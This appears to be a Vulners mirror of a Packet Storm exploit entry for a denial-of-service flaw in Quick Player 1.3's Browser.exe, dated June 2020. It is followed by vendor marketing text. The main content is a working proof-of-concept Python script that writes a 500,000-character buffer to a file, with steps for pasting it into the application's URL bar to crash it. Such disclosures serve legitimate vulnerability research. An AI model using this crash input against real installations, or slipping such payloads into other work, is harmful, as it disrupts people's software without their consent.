Lucene search
K

Quick Player 1.3 Denial Of Service

🗓️ 05 Jun 2020 00:00:00Reported by Felipe WinsnesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 254 Views

Quick Player 1.3 Denial of Service vulnerability on Window

Code
`# Exploit Title: Quick Player 1.3 - 'Browser.exe' Denial of Service  
# Date: 06/05/2020  
# Author: Felipe Winsnes  
# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html  
# Version: 1.3  
# Tested on: Windows 7  
  
# Proof of Concept:  
  
# 1.- Run the python script "poc.py", it will create a new file "poc.txt"  
  
# 2.- Open the application "Browser.exe"  
  
# 3.- Paste the contents of "poc.txt" within the url bar  
  
# 4.- Crashed  
  
# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Quick-Player-Browser-dos/  
# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings7/2.gif   
  
buffer = "A" * 500000  
  
f = open ("poc.txt", "w")  
  
f.write(buffer)  
  
f.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation